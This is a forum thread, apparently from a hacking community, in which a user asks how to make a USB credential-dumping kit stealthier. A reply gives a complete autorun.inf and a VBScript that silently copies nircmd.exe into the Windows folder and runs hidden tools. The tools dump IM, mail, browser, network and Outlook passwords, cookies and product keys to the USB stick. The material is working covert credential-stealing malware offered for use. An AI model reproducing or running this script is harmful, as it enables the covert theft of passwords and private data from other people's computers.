USB Pocket-knife/Hacksaw thing

Krispy101

Hi guys, saw the video on USB Hacks a while ago, but just got into this thing ;D

I wondered if you guys could help me.

I don't have a U3 drive, but have this;

hxxp: www. usbhacks. com/wp-content/uploads/USBSwitchblade_noU3. rar

I also have this;

PocketKnife_b06_2_1

Well.  the USBSwitchblade_noU3 doesn't correctly dump ANYTHING, other than my history.

But, the PocketKnife dumps everything perfectly, but the only way I can activate it is via the CMD config thing.

I wondered if you guys could help me combine the efficiency of the PocketKnife, with the stealth of the Switchblade noU3.

Thanks, in anticipation, Kris

• 3 weeks later...
  • 1 year later...
Hi guys, saw the video on USB Hacks a while ago, but just got into this thing ;D

I wondered if you guys could help me.

I don't have a U3 drive, but have this;

hxxp: www. usbhacks. com/wp-content/uploads/USBSwitchblade_noU3. rar

I also have this;

PocketKnife_b06_2_1

Well.  the USBSwitchblade_noU3 doesn't correctly dump ANYTHING, other than my history.

But, the PocketKnife dumps everything perfectly, but the only way I can activate it is via the CMD config thing.

I wondered if you guys could help me combine the efficiency of the PocketKnife, with the stealth of the Switchblade noU3.

Thanks, in anticipation, Kris

Hi ! i have just downloaded USBSwitchblade_noU3. rar and i made a Script in VBscript to replace Batch files and to copy nircmd.exe in the windows Folder in the background not like batch file when is running you can see the black console i hope that resolve your problem man!

The Srcipt Name is Hackoo.vbs you must put it in the root of your USB with nircmd.exe

and edit and replace the Autorun.inf like this:

----------------------------Autorun--------------------------------------

[autorun]

shellexecute = wscript Hackoo.vbs

shell\open=Ouvrir

shell\Open\Command= wscript Hackoo.vbs

shell\open\Default=1

-------------------------------------------------------------------------------------------------------------------------------

'-----------------------------------------------Code Source of Hackoo.vbs------------------------------------------------

Function CMD()

Dim WshShell,Command,Command1,Command2,Command3,Command4,Command5,Command6

Dim Command7,Command8,Command9,Command10,Command11,Command12,Command13,Command14

Dim Result,Result1,Result2,Result3,Result4,Result5,Result6,Result7

Dim Result8,Result9,Result10,Result11,Result12,Result13,Result14,fso,nircmd,Windir

Set fso = CreateObject("Scripting.FileSystemObject")

Set windir = FSO.GetSpecialFolder(0)

cible=windir & "\"

nircmd="nircmd.exe"

if (not fso.fileexists(windir & "\nircmd.exe")) then

fso.copyfile nircmd , cible

end if

Set WshShell=WScript.CreateObject("WScript.Shell")

Command = "%COMSPEC% /C nircmd.exe execmd mkdir dump\~$sys.computername$"

Command1 = "%COMSPEC% /C nircmd.exe execmd .\batexe\mspass.exe /shtml dump\~$sys.computername$\IMClients.html"

Command2 = "%COMSPEC% /C nircmd.exe execmd .\batexe\mailpv.exe /shtml dump\~$sys.computername$\mail.html"

Command3 = "%COMSPEC% /C nircmd.exe execmd .\batexe\pspv.exe /shtml dump\~$sys.computername$\selected.html"

Command4 = "%COMSPEC% /C nircmd.exe execmd .\batexe\iehv.exe /shtml dump\~$sys.computername$\history.html"

Command5 = "%COMSPEC% /C nircmd.exe execmd .\batexe\ProduKey.exe /shtml dump\~$sys.computername$\ProductKey.html"

Command6 = "%COMSPEC% /C nircmd.exe execmd .\batexe\iepv.exe /shtml dump\~$sys.computername$\IEPasswords.html"

Command7 = "%COMSPEC% /C nircmd.exe execmd .\batexe\netpass.exe /shtml dump\~$sys.computername$\NetworkPasswords.html"

Command8 = "%COMSPEC% /C nircmd.exe execmd .\batexe\pstpassword.exe /shtml dump\~$sys.computername$\PstPassword.html"

Command9 = "%COMSPEC% /C nircmd.exe execmd .\batexe\cports.exe /shtml dump\~$sys.computername$\OpenPorts.html"

Command10 = "%COMSPEC% /C nircmd.exe execmd .\batexe\awatch.exe /shtml dump\~$sys.computername$\NetworkAdapter.html"

Command11 = "%COMSPEC% /C nircmd.exe execmd .\batexe\mzcv.exe /shtml dump\~$sys.computername$\MozillaCookies.html"

Command12 = "%COMSPEC% /C nircmd.exe execmd .\batexe\wul.exe /shtml dump\~$sys.computername$\InstalledUpdates.html"

Command13 = "%COMSPEC% /C nircmd.exe execmd .\batexe\strun.exe /shtml dump\~$sys.computername$\Startup.html"

Command14 = "%COMSPEC% /C nircmd.exe execmd .\batexe\servimin.exe /shtml dump\~$sys.computername$\Services.html"

Result = WshShell.Run(Command,0,True)

Result1 = WshShell.Run(Command1,0,True)

Result2 = WshShell.Run(Command2,0,True)

Result3 = WshShell.Run(Command3,0,True)

Result4 = WshShell.Run(Command4,0,True)

Result5 = WshShell.Run(Command5,0,True)

Result6 = WshShell.Run(Command6,0,True)

Result7 = WshShell.Run(Command7,0,True)

Result8 = WshShell.Run(Command8,0,True)

Result9 = WshShell.Run(Command9,0,True)

Result10 = WshShell.Run(Command10,0,True)

Result11 = WshShell.Run(Command11,0,True)

Result12 = WshShell.Run(Command12,0,True)

Result13 = WshShell.Run(Command13,0,True)

Result14 = WshShell.Run(Command14,0,True)

End Function

Function explorer

Set shl=CreateObject("Shell.Application")

Set fso = CreateObject("Scripting.FileSystemObject")

shl.Explore fso.GetParentFolderName(location)

end Function

CMD

explorer

'-------------------------------------------------------------------------------------------------------------------------------

Hackoo.rar